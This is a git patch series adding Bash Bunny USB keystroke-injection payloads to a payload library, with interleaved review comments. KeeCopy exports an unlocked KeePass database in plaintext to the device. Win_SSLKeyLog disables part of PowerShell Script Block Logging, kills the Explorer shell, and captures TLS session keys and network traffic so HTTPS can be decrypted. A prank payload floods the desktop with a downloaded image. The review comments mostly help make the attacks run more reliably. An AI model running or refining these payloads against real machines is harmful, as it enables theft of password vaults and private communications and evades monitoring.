From 4c1c8d47cd29923aff907b71740dba0b39bc066e Mon Sep 17 00:00:00 2001 From: Jake Wimmer <67992074+jrwimmer@users.noreply.github.com> Date: Wed, 19 Jan 2022 11:32:58 -0800 Subject: [PATCH 1/4] Initial commit (#484) --- .../library/exfiltration/keecopy/README.md | 33 ++++++ .../library/exfiltration/keecopy/payload.txt | 102 ++++++++++++++++++ 2 files changed, 135 insertions(+) create mode 100644 payloads/library/exfiltration/keecopy/README.md create mode 100644 payloads/library/exfiltration/keecopy/payload.txt diff --git a/payloads/library/exfiltration/keecopy/README.md b/payloads/library/exfiltration/keecopy/README.md new file mode 100644 index 00000000..4166cf2a --- /dev/null +++ b/payloads/library/exfiltration/keecopy/README.md @@ -0,0 +1,33 @@ +# KeePass Automated Exporter + +- Title: KeeCopy +- Author: jrwimmer +- Version: 1.0 +- Target: Windows Vista+ +- Category: Exfiltration + +## Description + +Performs keystroke automation to export an unencrypted copy of an unlocked KeePass database +The copy is saved to the loot folder on the Bash Bunny USB Mass Storage partition + +Important Considerations: + +This script makes the following assumptions. +- The target computer is unlocked +- The target computer has KeePass 2.x installed and running with an unlocked database +- KeePass only has one database open, or the desired database was the last one in focus +- KeePass is using the default "Show KeePass window" hot key of: `Ctrl + Alt + K` + +## Configuration + +Hot key settings and/or script tweaks may be necessary depending on the target system. + +## STATUS + +| LED | Status | +| -------- | ------------------------- | +| STAGE1 | Determine output location | +| STAGE2 | Export database | +| FINISH | Payload complete | + diff --git a/payloads/library/exfiltration/keecopy/payload.txt b/payloads/library/exfiltration/keecopy/payload.txt new file mode 100644 index 00000000..2d3bafb1 --- /dev/null +++ b/payloads/library/exfiltration/keecopy/payload.txt 
@@ -0,0 +1,102 @@ +#!/bin/bash +# +# Title: KeeCopy +# Description: All-in-one script using keystroke automation to export an unencrypted copy of an unlocked KeePass database. +# The database copy is saved to the loot folder on the Bash Bunny USB Mass Storage partition +# Author: jrwimmer +# Version: 1.0 +# Category: Exfiltration +# Target: Windows Vista+ (PowerShell, clip.exe) +# Attackmodes: HID, Storage +# +# + +################################## +# Options # +################################## + +# KEEPASS_SHOW (DUCKY KEY COMBO) - Specify the hot key combination anticipated to show the KeePass window +KEEPASS_SHOW="CTRL-ALT k" + +# KEEPASS_WAITSAVE (MILLISECONDS) - How long to wait for KeePass to complete the export +KEEPASS_WAITSAVE=5000 + +# POWEROFF_AFTER (Y/N) - Power down the BashBunny upon completion +POWEROFF_AFTER="Y" + + +################################## +# Stage 1: Determine destination # +################################## +LED STAGE1 + +# Activate HID and STORAGE capabilities +ATTACKMODE HID STORAGE + +# Open PowerShell +RUN WIN powershell.exe +QUACK DELAY 2000 + +# Locate the BashBunny volume and store it on the clipboard +QUACK STRING "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \"(gwmi win32_volume -Filter {label='BashBunny'}).Name\" | clip;exit" +QUACK ENTER + +################################## +# Stage 2: Export database # +################################## +LED STAGE2 + +# Open KeePass +QUACK $KEEPASS_SHOW +QUACK DELAY 500 + +# Open the File menu +QUACK ALT f +QUACK DELAY 100 + +# Select "Export" +QUACK e +QUACK DELAY 100 + +# Move focus into the format selector +QUACK TAB +QUACK TAB + +# Skip down to "Customizable HTML File" +QUACK c + +# Move up to "KeePass XML (2.x)" +QUACK UP + +# Move focus to the Destination File field +QUACK TAB + +# Paste the path copied in STAGE1 +QUACK CTRL v + +# Append the rest of the destination path +QUACK STRING "loot\KPDB-$(date +%Y%m%d-%k%M%S).xml" + +# ...and export! 
+QUACK ENTER + +# Wait for KeePass to complete the export +QUACK DELAY $KEEPASS_WAITSAVE + +################################## +# Cleanup # +################################## +LED CLEANUP + +# Synchronize disks +SYNC + +################################## +# Finish # +################################## +LED FINISH + +# Power off +if [ $POWEROFF_AFTER == "Y" ]; then + halt --poweroff +fi \ No newline at end of file From 95e1d22deed42fd7a0a9aec1a8305abcc9791d62 Mon Sep 17 00:00:00 2001 From: TW-D <75358550+TW-D@users.noreply.github.com> Date: Fri, 21 Jan 2022 19:53:08 -0500 Subject: [PATCH 2/4] Add Win_SSLKeyLog (#485) * Add Win_SSLKeyLog Captures the client network session. Captures the client side session keys. 1) Partially avoids "PowerShell Script Block Logging". 2) Closing of all windows. 3) Hide "PowerShell" window. 4) Check if current process have "Administrator" privilege. 5) Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information. 6) Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)". 7) Writes the file system cache to disk (thanks to @dark_pyrro). 8) Safely eject (thanks to @Night (9o3)). * Correction of some information in "README.md" --- .../credentials/win_sslkeylog/README.md | 63 ++++++++++ .../credentials/win_sslkeylog/payload.ps1 | 58 ++++++++++ .../credentials/win_sslkeylog/payload.txt | 108 ++++++++++++++++++ 3 files changed, 229 insertions(+) create mode 100644 payloads/library/credentials/win_sslkeylog/README.md create mode 100644 payloads/library/credentials/win_sslkeylog/payload.ps1 create mode 100644 payloads/library/credentials/win_sslkeylog/payload.txt diff --git a/payloads/library/credentials/win_sslkeylog/README.md b/payloads/library/credentials/win_sslkeylog/README.md new file mode 100644 index 00000000..26f5e470 --- /dev/null +++ b/payloads/library/credentials/win_sslkeylog/README.md 
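Review bot: The STATUS table in README.md documents STAGE1, STAGE2 and FINISH only, but payload.txt also sets `LED CLEANUP` before `SYNC`, so the table is missing a row for that state. In payload.txt the test `if [ $POWEROFF_AFTER == "Y" ]` leaves the variable unquoted; `if [ "$POWEROFF_AFTER" = "Y" ]` keeps the comparison valid when the option is blank or contains a space. The README's "Important Considerations" should also state plainly what the payload leaves behind, since that is what an administrator reviewing an incident will look for: a plaintext KeePass XML export under `loot\KPDB-<timestamp>.xml` on the device storage, and on the host a PowerShell window opened via `RUN WIN powershell.exe` plus the export action performed in the KeePass UI.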
@@ -0,0 +1,63 @@ +# "Microsoft Windows" SSLKEYLOG + +- Title: Win_SSLKeyLog +- Author: TW-D +- Version: 1.0 +- Target: Microsoft Windows +- Category: Credentials + +## Description + +> +> Captures the client network session. +> +> Captures the client side session keys. +> + +1) Partially avoids "PowerShell Script Block Logging". +2) Closing of all windows. +3) Hide "PowerShell" window. +4) Check if current process have "Administrator" privilege. +5) Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information. +6) Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)". +7) Writes the file system cache to disk. +8) Safely eject. + +## Configuration + +From "payload.txt" change the values of the following constants : +```bash + +######## INITIALIZATION ######## + +readonly BB_LABEL="BashBunny" +readonly SNIFFING_TIME=300 + + +``` + +## Required + +Utility that converts an .etl file containing a Windows network packet capture into .pcapng format. +[ETL2PCAPNG](https://github.com/microsoft/etl2pcapng) + +Wireshark network protocol analyzer. +[WIRESHARK](https://www.wireshark.org/) + +## Steps + +Convert "capture.etl" file into "capture.pcapng" with "etl2pcapng". +``` +.\etl2pcapng.exe .\capture.etl .\capture.pcapng +``` + +Open your "capture.pcapng" with "Wireshark". + +Configure "Wireshark" for HTTPS decryption. +``` +Edit - Preferences +Protocols - (SSL and/or TLS) +(Pre)-Master-Secret log filename -> Browse -> SSLKEYLOGFILE.txt +``` + +Happy hunting. diff --git a/payloads/library/credentials/win_sslkeylog/payload.ps1 b/payloads/library/credentials/win_sslkeylog/payload.ps1 new file mode 100644 index 00000000..b0df0e4b --- /dev/null +++ b/payloads/library/credentials/win_sslkeylog/payload.ps1 
@@ -0,0 +1,58 @@ +# +# Author: TW-D +# Version: 1.0 +# + +Param ( + [String] $BB_VOLUME, + [Int] $SNIFFING_TIME +) + +# Partially avoids "PowerShell Script Block Logging". +# +$etw_provider = [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider").GetField("etwProvider", "NonPublic,Static") +$event_provider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid()) +$etw_provider.SetValue($null, $event_provider) + +# Closing of all windows. +# +Get-Process -Name "explorer" | Stop-Process + +# Hide "PowerShell" window. +# +$Script:showWindowAsync = Add-Type -MemberDefinition @" +[DllImport("user32.dll")] +public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow); +"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru +$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null + +# Check if current process have "Administrator" privilege. +# +If ( ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") ) { + + $bb_loot = "${BB_VOLUME}loot\" + + # Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information. + # + [Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", $null, "User") + [Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", "${bb_loot}SSLKEYLOGFILE.txt", "User") + + # Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)". + # + (NETSH trace start capture=yes report=no persistent=yes traceFile="${bb_loot}capture.etl" maxSize=0 fileMode=append) | Out-Null + Start-Sleep -Seconds $SNIFFING_TIME + (NETSH trace stop) | Out-Null + + [Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", $null, "User") + +} + +"Win_SSLKeyLog terminated." | Out-File -FilePath .\..\..\loot\done.txt -Force + +# Writes the file system cache to disk (thanks to @dark_pyrro). 
+# +Write-VolumeCache -DriveLetter ("${BB_VOLUME}".Substring(0,1)) + +# Safely eject (thanks to @Night (9o3)). +# +(New-Object -ComObject Shell.Application).Namespace(17).ParseName("${BB_VOLUME}").InvokeVerb("Eject") \ No newline at end of file diff --git a/payloads/library/credentials/win_sslkeylog/payload.txt b/payloads/library/credentials/win_sslkeylog/payload.txt new file mode 100644 index 00000000..1dbcb386 --- /dev/null +++ b/payloads/library/credentials/win_sslkeylog/payload.txt 
@@ -0,0 +1,108 @@ +#!/bin/bash +# +# Title: Win_SSLKeyLog +# +# Description: +# Captures the client network session. +# Captures the client side session keys. +# +# 1) Partially avoids "PowerShell Script Block Logging". +# 2) Closing of all windows. +# 3) Hide "PowerShell" window. +# 4) Check if current process have "Administrator" privilege. +# 5) Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information. +# 6) Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)". +# 7) Writes the file system cache to disk (thanks to @dark_pyrro). +# 8) Safely eject (thanks to @Night (9o3)). +# +# Author: TW-D +# Version: 1.0 +# Category: Credentials +# Target: Microsoft Windows 10 +# Attackmodes: HID and STORAGE +# +# TESTED ON +# =============== +# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1) +# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1) +# +# REQUIREMENTS +# =============== +# The target user must belong to the 'Administrator' group. +# +# STATUS +# =============== +# Magenta solid ................................... SETUP +# Yellow single blink ............................. ATTACK +# Yellow double blink ............................. STAGE2 +# Yellow triple blink ............................. STAGE3 +# Cyan inverted single blink ...................... SPECIAL +# White fast blink ................................ CLEANUP +# Green 1000ms VERYFAST blink followed by SOLID ... 
FINISH + +######## INITIALIZATION ######## + +readonly BB_LABEL="BashBunny" +readonly SNIFFING_TIME=300 + +######## SETUP ######## + +LED SETUP + +ATTACKMODE HID STORAGE +GET SWITCH_POSITION +udisk mount + +######## ATTACK ######## + +LED ATTACK + +Q DELAY 5000 +Q GUI r +Q DELAY 5000 +Q STRING "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass" +Q DELAY 1500 +Q CTRL-SHIFT ENTER +Q DELAY 5000 +Q LEFTARROW +Q DELAY 3000 +Q ENTER +Q DELAY 7000 + +LED STAGE2 + +Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)\"" +Q ENTER +Q DELAY 3500 + +Q STRING "\$BB_SWITCH = \"\${BB_VOLUME}payloads\\${SWITCH_POSITION}\\\"" +Q ENTER +Q DELAY 1500 + +Q STRING "CD \"\${BB_SWITCH}\"" +Q ENTER +Q DELAY 1500 + +LED STAGE3 + +Q STRING ".\payload.ps1 -BB_VOLUME \"\${BB_VOLUME}\" -SNIFFING_TIME ${SNIFFING_TIME}" +Q ENTER +Q DELAY 1500 + +LED SPECIAL + +until [ -f /root/udisk/loot/done.txt ]; do sleep 10; sync; done + +######## CLEANUP ######## + +LED CLEANUP + +rm /root/udisk/loot/done.txt +sync +udisk unmount + +######## FINISH ######## + +LED FINISH + +shutdown -h 0 \ No newline at end of file From f5292aa8cebfdf56b233907be7e2afa8f87dbfd5 Mon Sep 17 00:00:00 2001 From: JustaProgrammer9 <95446075+JustaProgrammer9@users.noreply.github.com> Date: Fri, 21 Jan 2022 20:02:26 -0500 Subject: [PATCH 3/4] Desktop flooder (#479) * Desktop Flooder downloads an image from a link and saves it, then copies the images all over the desktop. * Update README.md * Update README.md * Update README.md * Update payload.txt --- payloads/library/prank/DesktopFlood/README.md | 13 ++++++ .../library/prank/DesktopFlood/payload.txt | 46 +++++++++++++++++++ 2 files changed, 59 insertions(+) create mode 100644 payloads/library/prank/DesktopFlood/README.md create mode 100644 payloads/library/prank/DesktopFlood/payload.txt 
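Review bot: README.md item 2, "Closing of all windows", understates what payload.ps1 does: `Get-Process -Name "explorer" | Stop-Process` terminates the user's Explorer shell (desktop and taskbar), not just open windows, and the README should say so. In payload.ps1, `[Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", ..., "User")` writes a persistent per-user value (HKCU\Environment) that only processes started after that point pick up, and `NETSH trace start ... persistent=yes` creates a trace session that survives a reboot; if the script is interrupted during `Start-Sleep -Seconds $SNIFFING_TIME`, both the environment value and the trace session remain on the host until cleared, which the README should document as a side effect. The script also writes "Win_SSLKeyLog terminated." to done.txt whether or not the Administrator check passed, so payload.txt cannot tell a successful run from one that skipped the capture; writing a distinct status for the skipped case would make the result unambiguous. In payload.txt, `until [ -f /root/udisk/loot/done.txt ]; do sleep 10; sync; done` has no upper bound, so if the elevation prompt is dismissed and payload.ps1 never runs, the device never reaches CLEANUP. Finally, the REQUIREMENTS comment says the user must belong to the "Administrator" group; the built-in local group is "Administrators", and README.md's "Target: Microsoft Windows" should match the "Microsoft Windows 10" target stated in payload.txt.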
diff --git a/payloads/library/prank/DesktopFlood/README.md b/payloads/library/prank/DesktopFlood/README.md new file mode 100644 index 00000000..9602cb8c --- /dev/null +++ b/payloads/library/prank/DesktopFlood/README.md @@ -0,0 +1,13 @@ +# DesktopFlood +Floods the desktop with a image of your choice + +## Configuration +Image Link, Image Name, Amount of Images. Bluetooth if you want, in Setup + +## LED + +| COLOR | DESCRIPTION | +|---------|-------------| +| White | Setup/Wait | +| Yellow | Attacking | +| Green | Finished | diff --git a/payloads/library/prank/DesktopFlood/payload.txt b/payloads/library/prank/DesktopFlood/payload.txt new file mode 100644 index 00000000..0ab24c96 --- /dev/null +++ b/payloads/library/prank/DesktopFlood/payload.txt @@ -0,0 +1,46 @@ +#!/bin/bash +# +# Title: Desktop Flood +# Description: Floods desktop with image it downloads from link +# Author: JustaProgrammer9 +# Category: Prank +# Target: Windows +# Attackmodes: HID +# + +#--// CONFIG \\--# + +#removing [ https:// ] can help keep command below runbox character limit + +ImageLink='i.ytimg.com/vi/7yN0g2QIJSU/maxresdefault.jpg' + +ImageName="Gift" + +Amount=50 + + +####--// SETUP \\--#### + +LED W + +ATTACKMODE HID + +#--> FOR BLUETOOTH <--# + +#WAIT_FOR_PRESENT YourDevice +#WAIT_FOR_NOT_PRESENT YourDevice + + +#--// ATTACK \\--# + +LED Y + +RUN WIN "cmd /c powershell \"curl $ImageLink -O C:\Users\%USERNAME%\Desktop\$ImageName.jpg;sleep 1;1..$Amount | % { copy-Item \"C:\Users\%USERNAME%\desktop\$ImageName.jpg\" \"C:\Users\%USERNAME%\desktop\$ImageName\$_.jpg\"}\"" + +Q ENTER + + +####--// DONE \\--#### + +LED G + From fab14668969ff720cd3cfea30cb5b50c38598e3c Mon Sep 17 00:00:00 2001 
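Review bot: README.md for DesktopFlood lacks the Title/Author/Version/Target/Category block that the other payload READMEs in this series carry, and "Floods the desktop with a image" should read "an image". The README should also state that the payload requires network access from the target, since the `RUN WIN` line fetches `$ImageLink` with `curl` (the PowerShell alias for Invoke-WebRequest), and that it writes `$Amount` copies of the downloaded file to the user's Desktop that are not removed afterwards. In payload.txt the hard-coded `C:\Users\%USERNAME%\Desktop` path assumes the profile directory lives under C:\Users, which is not always true; `$env:USERPROFILE` would be the portable equivalent.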
From: JustaProgrammer9 <95446075+JustaProgrammer9@users.noreply.github.com> Date: Mon, 24 Jan 2022 14:28:25 -0500 Subject: [PATCH 4/4] so it actually works (#486) I foolishly forgot to add a second backslash to $ImageName --- payloads/library/prank/DesktopFlood/payload.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/prank/DesktopFlood/payload.txt b/payloads/library/prank/DesktopFlood/payload.txt index 0ab24c96..bc13e6be 100644 --- a/payloads/library/prank/DesktopFlood/payload.txt +++ b/payloads/library/prank/DesktopFlood/payload.txt @@ -35,7 +35,7 @@ ATTACKMODE HID LED Y -RUN WIN "cmd /c powershell \"curl $ImageLink -O C:\Users\%USERNAME%\Desktop\$ImageName.jpg;sleep 1;1..$Amount | % { copy-Item \"C:\Users\%USERNAME%\desktop\$ImageName.jpg\" \"C:\Users\%USERNAME%\desktop\$ImageName\$_.jpg\"}\"" +RUN WIN "cmd /c powershell \"curl $ImageLink -O C:\Users\%USERNAME%\Desktop\\$ImageName.jpg;sleep 1;1..$Amount | % { copy-Item \"C:\Users\%USERNAME%\desktop\\$ImageName.jpg\" \"C:\Users\%USERNAME%\desktop\\$ImageName\$_.jpg\"}\"" Q ENTER
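Review bot: The fix correctly changes the three `\$ImageName` occurrences to `\\$ImageName` so that bash expands the variable and PowerShell receives a literal backslash before the file name, while `\$_` is rightly left single-escaped so PowerShell sees its own `$_`. Because the same line mixes bash-expanded variables (`$ImageLink`, `$ImageName`, `$Amount`) with PowerShell-side `$_`, a comment above the `RUN WIN` line spelling out which `$` belong to which interpreter would prevent a repeat of the mistake the commit message describes. The subject "so it actually works" also does not describe the change; something like "Escape $ImageName in RUN WIN command" would make the history searchable.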